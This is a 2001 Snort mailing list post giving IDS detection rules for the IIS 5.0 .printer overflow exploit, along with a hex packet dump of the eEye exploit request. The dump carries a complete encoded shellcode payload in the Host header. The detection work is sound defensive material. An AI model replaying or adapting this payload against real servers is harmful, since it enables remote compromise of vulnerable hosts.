Snort mailing list archives

Previous By Date Next
Previous By Thread Next

IIS 5.0 printer exploit signature

From: Brian Caswell <bmc () mitre org>
Date: Wed, 02 May 2001 16:34:25 -0400
Snort 1.8 rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer
attempt"; uricontent:".printer"; nocase; flags:A+;
reference:cve,CAN-2001-0241; classtype:attempted-admin;)

Snort 1.7 rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer
attempt"; content:".printer"; nocase; flags:A+;
reference:cve,CAN-2001-0241;)

Snort 1.6.3 rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer
attempt"; content:".printer"; nocase; flags:AP;)

Below is a packet dump from the eEye exploit.  Until we have session
decodes, we can't check both Host: and the URI.  (Adding as many HTTP
headrs as you want can offset the Host: header into a different
packet.  We could use an activate/dynamic rule pair to be more
accurate, but as a standard we havn't used those in the snort.org
ruleset yet.  This looks like the first time.  Check back later for an
activate/dynamic rule that is more specific.

05/02-16:23:12.028893 192.168.0.9:16777 -> 192.168.0.10:80
TCP TTL:64 TOS:0x0 ID:28940 IpLen:20 DgmLen:383 DF
***AP*** Seq: 0x51D013C1  Ack: 0x57194C33  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 70 72 69 6E 74 65  GET /null.printe
72 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74  r HTTP/1.1..Host
3A 20 8B C4 83 C0 11 33 C9 66 B9 20 01 80 30 03  : .....3.f. ..0.
40 E2 FA EB 03 03 03 03 5C 88 E8 82 EF 8F 09 03  @.......\.......
03 44 80 3C FC 76 F9 80 C4 07 88 F6 30 CA 83 C2  .D.<.v......0...
07 88 04 8A 05 80 C5 07 80 C4 07 E1 F7 30 C3 8A  .............0..
3D 80 C5 07 80 C4 17 8A 3D 80 C5 07 30 C3 82 C4  =.......=...0...
FC 03 03 03 53 6B 83 03 03 03 69 01 53 53 6B 03  ....Sk....i.SSk.
03 03 43 FC 76 13 FC 56 07 88 DB 30 C3 53 54 69  ..C.v..V...0.STi
48 FC 76 17 50 FC 56 0F 50 FC 56 03 53 FC 56 0B  H.v.P.V.P.V.S.V.
FC FC FC FC CB A5 EB 74 8E 28 EA 74 B8 B3 EB 74  .......t.(.t...t
27 49 EA 74 60 39 5F 74 74 74 2D 66 46 7A 66 2D  'I.t`9_ttt-fFzf-
60 6C 6E 2D 77 7B 77 03 6A 6A 70 6B 62 60 68 31  `ln-w{w.jjpkb`h1
68 23 2E 23 66 46 7A 66 23 47 6A 64 77 6A 62 6F  h#.#fFzf#Gjdwjbo
23 50 66 60 76 71 6A 77 7A 0E 09 23 45 6C 71 23  #Pf`vqjwz..#Elq#
67 66 77 62 6A 6F 70 23 75 6A 70 6A 77 39 23 4B  gfwbjop#ujpjw9#K
77 77 73 39 2C 2C 74 74 74 2D 66 46 7A 66 2D 60  wws9,,ttt-fFzf-`
6C 6E 03 03 03 03 03 03 03 03 03 03 03 03 03 03  ln..............
03 03 03 03 03 03 90 90 90 90 90 90 90 90 CB 4A  ...............J
42 6C 90 90 90 90 66 81 EC 14 01 FF E4 03 03 03  Bl....f.........
03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03  ................
03 03 03 0D 0A 0D 0A                             .......

-- 
Brian Caswell
The MITRE Corporation

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: